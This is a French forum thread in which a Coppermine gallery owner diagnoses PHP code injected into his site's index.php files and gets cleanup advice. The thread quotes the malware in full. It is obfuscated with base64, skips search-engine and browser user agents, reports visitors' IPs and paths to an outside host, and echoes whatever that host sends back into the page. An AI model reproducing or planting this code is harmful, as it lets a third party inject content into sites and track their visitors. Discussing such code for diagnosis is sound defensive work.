Print

[lemaquettiste]

Bonjour tout le monde,

J'utilise depuis plusieurs années coppermine http://www.retroplane.net/album/index.php?  et fais régulièrement les mises à jour, je suis actuellement avec la version 1.5.20

Je vous expose mon problème:
régulièrement je constate que je n'ai plus accès à l'index de ma gallerie, ça me met cette erreur
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/www/bb5b67d233c6cbdf9e9c5f2a98bd475f/web/album/index.php on line 452

en réuploadant via ftp l'index.php d'origine ça règle le problème

j'ai donc regardé à la ligne 452 de l'index "vérolé" ce qui pouvait poser problème, et je constate, en comparant avec l'index original que j'ai tout un code, ci-dessous qui est ajouté

Code: [Select]

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == 

false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdEIvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode

($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

y a t'il  un piratage de mon index? par où cela se fait il? est-ce une faille de coppermine ou seulement moi qui a une faille quelque part?
si vous pouviez m'éclairer, je vous en serais reconnaissant, merci

[François Keller]

Bonjour,

le code  que vous postez est celui d'un "tracker" pour des statistiques. Est ce que vous avez ajouté quelque part un service de statistiques pour votre site ?
si oui, c'est de là que ça vient, si non, il faudrait réussir à déterminer comment ce code est ajouté dans le fichier (par l'hébergeur, par un script présent sur le serveur et qui vérole la galerie ...)
Vérifiez qu'il n'y a pas de fichier sur le serveur qui n'a rien à y faire

[lemaquettiste]

En "service" externe, j'ai xiti et adsence, mais leur code d'origine n'a pas bougé. Je ne comprend pas comment arrive ce code, vraiment bizarre
là j'ai modifié la permission de index.php de 755 à 555, je ne sais pas si ça peut empécher une écriture externe?

[lemaquettiste]

Bon ben en tapant le début de ce code dans google il s'avère que c'est un code malicieux qui infectent tous les index.php du site. J'ai donc vite regardé l'index de mon forum et l'index de mon livre d'or et ceux ci avaient bien ce code je les ai reuploadé propre et je vais surveiller tous les jours, mais bon le problème c'est de savoir par quelle faille ils rentrent ce code, et là pour moi c'est mission quasi impossible vu mon incompétence et les milliers de fichiers de mon site.

[François Keller]

Il est possible qu'il soit présent dans un fichier image téléchargé par quelqu'un.
Il faudrait faire une recherche du code dans l'ensemble des fichiers du serveur.
Ce n'est pas obligatoirement une faille de Coppermine, mais peut être aussi du forum (quel est le script utilisé ?) ou une action malveillante d'un utilisateur...

[lemaquettiste]

D'après recherche plus approfondie le problème est apparement connu, ce code est injecté dans tous les index.php d'un site web. Rien n'indique que Coppermine soit en cause. En fait si ce code ne faisait pas bugguer l'index coppermine, je ne l'aurais jamais décelé. Sur mes autres index, le code était placé à la fin et restait invisible. Certains disent que ça peut être suite à une intrusion via ftp, donc j'ai changé mon mot de passe et mis mes divers index.php en chmod 444. Pour l'instant le code n'a pas été réinjecté, je surveille....

Il faudrait faire une recherche du code dans l'ensemble des fichiers du serveur.

J'en ai vérifié quelques uns, mais rien trouvé, comment je pourrais vérifier tous les fichiers? y'aurait une astuce pour scanner tout le domaine? mon site pèse 8go, des milliers de fichiers...

[François Keller]

J'en ai vérifié quelques uns, mais rien trouvé, comment je pourrais vérifier tous les fichiers? y'aurait une astuce pour scanner tout le domaine? mon site pèse 8go, des milliers de fichiers...

Avec certains éditeurs de texte orientés programmation, on peut faire une recherche sur l'ensemble des fichiers d'un dossier. Mais ça reste fastidieux pour un nombre important de fichiers.
Maintenant, si au bout de quelques temps, il n'y a plus d'injection de code, le fichier malveillant originel a certainement été éliminé.